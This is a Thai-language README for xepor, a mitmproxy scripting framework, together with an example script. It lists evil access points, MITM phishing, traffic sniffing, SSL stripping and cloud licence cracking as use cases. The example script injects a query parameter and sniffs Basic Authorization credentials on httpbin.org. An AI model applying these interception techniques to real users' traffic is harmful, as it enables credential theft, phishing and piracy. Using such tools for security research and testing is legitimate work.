xepor

Xepor (อ่านว่า /ˈzɛfə/ , zephyr) เป็นเฟรมเวิร์กการกำหนดเส้นทางเว็บสำหรับวิศวกรย้อนกลับและนักวิจัยด้านความปลอดภัย โดยมี API ที่คล้าย Flask สำหรับแฮกเกอร์เพื่อสกัดกั้นและแก้ไขคำขอ HTTP และ/หรือการตอบสนอง HTTP ในรูปแบบการเขียนโค้ดที่เป็นมิตรต่อมนุษย์

โปรเจ็กต์นี้มีไว้เพื่อใช้กับ mitmproxy ผู้ใช้เขียนสคริปต์ด้วย xepor และรันสคริปต์ ภายใน mitmproxy ด้วย mitmproxy -s your-script.py

หากคุณต้องการก้าวจาก PoC ไปสู่การใช้งานจริง จากการสาธิต (เช่น http-reply-from-proxy.py, http-trailers.py, http-stream-modify.py) ไปจนถึงสิ่งที่คุณสามารถนำออกไปได้ด้วย WiFi Pineapple ของคุณ Xepor เหมาะสำหรับคุณ!

1. เขียนโค้ดทุกอย่างด้วย @api.route() เช่นเดียวกับ Flask! เขียนทุกอย่างในสคริปต์ เดียว และไม่ต้อง if..else อีกต่อไป
2. จัดการเส้นทาง URL หลายเส้นทาง แม้กระทั่งหลายโฮสต์ในอินสแตนซ์ InterceptedAPI เดียว
3. สำหรับแต่ละเส้นทาง คุณสามารถเลือกที่จะแก้ไขคำขอ ก่อน เชื่อมต่อกับเซิร์ฟเวอร์ (หรือแม้แต่ส่งคืนการตอบกลับปลอมโดยไม่ต้องเชื่อมต่อกับอัปสตรีม) หรือแก้ไขการตอบกลับ ก่อน ส่งต่อไปยังผู้ใช้
4. โหมดบัญชีดำหรือโหมดบัญชีขาว อนุญาตเฉพาะจุดสิ้นสุด URL ที่กำหนดไว้ในสคริปต์เพื่อเชื่อมต่อกับอัปสตรีม โดยบล็อกสิ่งอื่นๆ (ในโดเมนที่ระบุ) ด้วย HTTP 404 เหมาะสำหรับการพร็อกซีแบบโปร่งใส
5. คำจำกัดความเส้นทาง URL ที่มนุษย์สามารถอ่านได้และการจับคู่ที่ขับเคลื่อนโดยการแยกวิเคราะห์
6. การแมปโฮสต์ใหม่ กำหนดกฎเพื่อเปลี่ยนเส้นทางไปยังอัปสตรีมของแท้จากโฮสต์ปลอมของคุณ รองรับการจับคู่ Regex ดีที่สุดสำหรับการลอก SSL และการแคร็กลิขสิทธิ์ฝั่งเซิร์ฟเวอร์ !
7. บวกกับสิ่งที่ดีที่สุดจาก mitmproxy! รองรับโหมดการทำงาน ทั้งหมด ( mitmproxy / mitmweb + regular / transparent / socks5 / reverse:SPEC / upstream:SPEC )

1. AP ที่ชั่วร้ายและฟิชชิ่งผ่าน MITM
2. ดมการรับส่งข้อมูลจากอุปกรณ์เป้าหมายโดย iptables + พร็อกซีแบบโปร่งใส แก้ไขเพย์โหลดด้วย xepor ได้ทันที
3. การแคร็กลิขสิทธิ์ซอฟต์แวร์บนคลาวด์ ดูตัวอย่าง/krisp/ เป็นตัวอย่าง
4. เขียนโปรแกรมรวบรวมข้อมูลเว็บที่ซับซ้อนด้วย โค้ดประมาณ 100 บรรทัด ดู examples/polyv_scrapper/ เป็นตัวอย่าง
5. ... และอีกมากมาย

โปรเจ็กต์นี้ไม่ได้จัดเตรียมการปอก SSL

pip install xepor

นำสคริปต์จาก example/httpbin เป็นตัวอย่าง

mitmweb -s example/httpbin/httpbin.py

ตั้งค่า Browser HTTP Proxy ของคุณเป็น http://127.0.0.1:8080 และเข้าถึงเว็บอินเตอร์เฟสที่ http://127.0.0.1:8081/

ส่งคำขอ GET จาก http://httpbin.org/#/HTTP_Methods/get_get จากนั้นคุณจะเห็นการแก้ไขที่ทำโดย Xepor ในอินเทอร์เฟซ mitmweb เครื่องมือ dev ของเบราว์เซอร์ หรือ Wireshark

httpbin.py ทำสองสิ่ง

1. เมื่อผู้ใช้เข้าถึง http://httpbin.org/get ให้ฉีดพารามิเตอร์สตริงการสืบค้น payload=evil_param ภายในคำขอ HTTP
2. เมื่อผู้ใช้เข้าถึง http://httpbin.org/basic-auth/xx/xx/ (เราแกล้งทำเป็นไม่รู้รหัสผ่าน) ให้ดมส่วนหัว Authorization จากคำขอ HTTP และพิมพ์รหัสผ่านไปยังผู้โจมตี

สิ่งที่ mitmproxy ทำอยู่เสมอ แต่มีโค้ดที่เขียนด้วยวิธี xepor

 # https://github.com/xepor/xepor-examples/tree/main/httpbin/httpbin.py
from mitmproxy . http import HTTPFlow
from xepor import InterceptedAPI , RouteType


HOST_HTTPBIN = "httpbin.org"

api = InterceptedAPI ( HOST_HTTPBIN )


@ api . route ( "/get" )
def change_your_request ( flow : HTTPFlow ):
    """
    Modify URL query param.
    Test at:
    http://httpbin.org/#/HTTP_Methods/get_get
    """
    flow . request . query [ "payload" ] = "evil_param"


@ api . route ( "/basic-auth/{usr}/{pwd}" , rtype = RouteType . RESPONSE )
def capture_auth ( flow : HTTPFlow , usr = None , pwd = None ):
    """
    Sniffing password.
    Test at:
    http://httpbin.org/#/Auth/get_basic_auth__user___passwd_
    """
    print (
        f"auth @ { usr } + { pwd } :" ,
        f"Captured { 'successful' if flow . response . status_code < 300 else 'unsuccessful' } login:" ,
        flow . request . headers . get ( "Authorization" , "" ),
    )


addons = [ api ]